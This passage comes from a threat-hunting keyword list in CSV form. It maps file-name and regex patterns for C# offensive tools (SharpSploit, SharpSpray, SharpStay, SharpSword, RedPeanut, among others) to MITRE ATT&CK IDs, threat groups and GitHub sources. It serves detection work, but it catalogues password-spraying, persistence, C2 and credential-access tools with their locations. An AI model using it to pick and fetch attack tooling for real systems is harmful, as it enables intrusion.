"*SharpSpawner.cs*",".{0,1000}SharpSpawner\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSphere.exe*",".{0,1000}SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSploit Command Execution*",".{0,1000}SharpSploit\sCommand\sExecution.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Credentials Commands*",".{0,1000}SharpSploit\sCredentials\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - 
TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Enumeration Commands*",".{0,1000}SharpSploit\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Lateral Movement Commands*",".{0,1000}SharpSploit\sLateral\sMovement\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Service*",".{0,1000}SharpSploit\sService.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit*",".{0,1000}SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of 
.NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.dll*",".{0,1000}SharpSploit\.dll.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Execution.*",".{0,1000}SharpSploit\.Execution\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Persistence.*",".{0,1000}SharpSploit\.Persistence\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole.sln*",".{0,1000}SharpSploitConsole\.sln.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole:>*",".{0,1000}SharpSploitConsole\:\>.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole_x*",".{0,1000}SharpSploitConsole_x.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpSploitConsole-master*",".{0,1000}SharpSploitConsole\-master.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitDomainRecon*",".{0,1000}SharpSploitDomainRecon.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSploitDomainReconImpl*",".{0,1000}SharpSploitDomainReconImpl.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - 
T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSploitService.exe*",".{0,1000}SharpSploitService\.exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploitSvc*",".{0,1000}SharpSploitSvc.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSplunkWhisperer2*",".{0,1000}SharpSplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*SharpSpoolTrigger.exe*",".{0,1000}SharpSpoolTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 
- T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSpray*",".{0,1000}SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","186","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" "*SharpSpray.exe *",".{0,1000}SharpSpray\.exe\s.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpSpray.exe*",".{0,1000}SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSpray\Program.cs*",".{0,1000}SharpSpray\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "*SharpSQLPwn.exe*",".{0,1000}SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpStay.csproj*",".{0,1000}SharpStay\.csproj.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Sharpstay.exe*",".{0,1000}Sharpstay\.exe\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay.sln*",".{0,1000}SharpStay\.sln.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay-master*",".{0,1000}SharpStay\-master.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation 
tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Sharp-Suite.git*",".{0,1000}Sharp\-Suite\.git.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SharpSvc.exe*",".{0,1000}SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSword.csproj*",".{0,1000}SharpSword\.csproj.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.sln*",".{0,1000}SharpSword\.sln.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword-main.*",".{0,1000}SharpSword\-main\..{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSystemTriggers.git*",".{0,1000}SharpSystemTriggers\.git.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers.sln*",".{0,1000}SharpSystemTriggers\.sln.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers-main*",".{0,1000}SharpSystemTriggers\-main.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpTask.exe*",".{0,1000}SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharptelnet *",".{0,1000}sharptelnet\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpTemplateResources/cmd/*",".{0,1000}SharpTemplateResources\/cmd\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
